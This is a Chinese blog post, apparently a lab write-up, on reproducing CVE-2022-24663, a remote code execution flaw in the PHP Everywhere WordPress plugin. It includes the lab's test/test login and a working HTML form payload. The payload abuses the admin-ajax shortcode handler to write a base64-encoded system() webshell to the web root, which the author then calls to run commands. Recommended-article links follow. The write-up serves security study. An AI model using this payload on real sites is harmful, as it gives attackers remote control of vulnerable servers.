春秋云境CVE-2022-24663复现

最新推荐文章于 2024-07-10 21:32:21 发布
最新推荐文章于 2024-07-10 21:32:21 发布
阅读量412 收藏
点赞数
文章标签: php 服务器 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_70303095/article/details/129353615
版权

CVE-2022-24663

wordpress插件PHP Everywhere RCE 2.0.3以下

利用春秋云境上的靶场

访问页面

wordpress的默认后台是wp-admin

默认密码test/test

提示任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码

这里指的是任意PHP代码并且是任意位置

1.构建payload

随便找个html页面进行exp注入(摘抄大佬的payload)

记得要修改域名为自己现在做的靶场域名

并且这里的代码使用的是system

我使用eval函数无法进行访问(求大佬指点)

<form action="http://eci-2ze5uttid7svzb873n4j.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php" method="post"> <input name="action" value="parse-media-shortcode" /> <textarea name="shortcode">[php_everywhere] <?php file_put_contents("/var/www/html/fuck.php",base64_decode("PD9waHAgc3lzdGVtKCRfR0VUWzFdKTsgPz4=")); ?>[/php_everywhere]</textarea> <input type="submit" value="Execute" /> </form>

2.插入payload

3.出现这个框之后,直接把这个框里面的内容全部替换成上面的代码,然后直接点击【Execute】:

4.注入成功

5.访问fuck.php文件,进行代码执行

求大佬指点错误。

W.167
关注
WordPress plugin 代码注入漏洞(CVE-2022-24663)
千寻的博客
12-09 2487
远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 `PHP Everywhere `的请求,并在站点上执行任意 PHP 代码。 存在常见用户名低权限用户弱口令
ED01-CMS 代码问题漏洞(CVE-2022-28525)
千寻的博客
11-27 1165
ED01-CMS v20180505 存在任意文件上传漏洞
春秋云境CVE-2022-24663复现
小高工作室
11-24 2514
远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。直接访问http://eci-2zei2lxiq05pi7hyrjxd.cloudeci1.ichunqiu.com/fuck.php。提示任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。发现是个wp的后台。返回状态码为200表示成功。这里指的是任意PHP代码并且是任意位置。
CVE-2022-24663复现
giaogiaogioao的博客
11-23 551
CVE-2022-24663
春秋云境CVE-2022-24663
一只爱吃橙子的羊
12-01 1566
远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。P.S. 存在常见用户名低权限用户弱口令
CVE-2022-24663
qq_43676541的博客
05-21 188
#简介 原文链接:https://culturesun.
CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现
weixin_45260839的博客
05-08 3292
CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现
春秋云境CVE-2022-29464
07-28
- *1* [【春秋云境CVE-2022-29464](https://blog.csdn.net/ZXW_NUDT/article/details/129159816)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
记录春秋云镜CVE-2022-32991复现过程
as_adwd的博客
03-19 286
个人记录(新手小白)春秋云镜CVE复现过程
CVE-2022-28525复现文档(巨详细,零基础复现
10-14
CVE-2022-28525 复现文档 本文档旨在详细介绍 CVE-2022-28525 的复现过程,涵盖了靶场的设置、用户名和密码的爆破、木马的上传、文件上传的修改、终端连接等多个方面,旨在帮助读者深入理解漏洞的原理和利用方法。 ...
D3CTF2022-官方WriteUp1
08-03
D3CTF2022-官方WriteUp1
春秋云镜 CVE-2022-24663
qq_22002773的博客
07-07 153
春秋云镜 CVE-2022-24663
春秋云境CVE-2022-24663(远程代码执行漏洞exp)
m0_65712192的博客
04-24 794
远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。P.S. 存在常见用户名低权限用户弱口令
春秋云镜CVE-2022-24663漏洞复现(最详细)
wakengren132的博客
09-13 529
远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。P.S. 存在常见用户名低权限用户弱口令。
春秋云境CVE-2022-25411(Maxsite CMS文件上传漏洞)
m0_65712192的博客
04-22 1315
Maxsite CMS存在文件上传漏洞,攻击者可利用该漏洞通过精心制作的PHP文件执行任意代码。账户为弱口令。
WordPress PHP Everywhere <= 2.0.3 远程代码执行漏洞(CVE-2022-24663
最新发布
Flag少侠的博客
07-10 1万+
打开靶场靶场页面如下WordPress 的后台是 /wp-admin,URL 拼接上访问网上搜索默认用户名密码 admin/password 不对,只能爆破了,得到 test/test登录后来到这个页面是一个 WordPress 插件,它允许在 WordPress 网站的任意位置(如页面、帖子、小工具和模板文件)执行 PHP 代码。这个插件对于希望在其网站上嵌入动态内容的开发人员和高级用户非常有用。然而,它也带来了安全风险,尤其是在权限控制不当的情况下。功能和使用插件的主要功能是通过短代码。
春秋云境系列靶场记录(合集)-不再更新
一只爱吃橙子的羊
11-29 7642
春秋云境系列靶场记录合集,不更新了哈……
春秋云境CVE-2022-28060
一只爱吃橙子的羊
11-29 2562
Victor CMS v1.0 /includes/login.php 存在sql注入
春秋云境CVE-2022-25099
一只爱吃橙子的羊
12-01 1405
WBCE CMS v1.5.2 /language/install.php 文件存在漏洞,攻击者可精心构造文件上传造成RCE
春秋云境CVE-2022-29464
09-05
春秋云境CVE-2022-29464是指WSO2 API Manager 文件上传漏洞的CVE编号。这个漏洞允许攻击者通过上传恶意文件来执行任意代码,进而导致服务器受到攻击。根据引用,在GitHub上有一个项目,其中包含了与该漏洞相关的利用代码和解释。引用提供了一个具体的漏洞利用脚本的地址。如果您想了解更多关于该漏洞的细节和分析,可以参考引用中提到的文章。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [【春秋云境CVE-2022-29464](https://blog.csdn.net/m0_49025459/article/details/130400369)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [春秋云境靶场 WSO2文件上传漏洞(CVE-2022-29464)](https://blog.csdn.net/qq_52923396/article/details/131832217)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值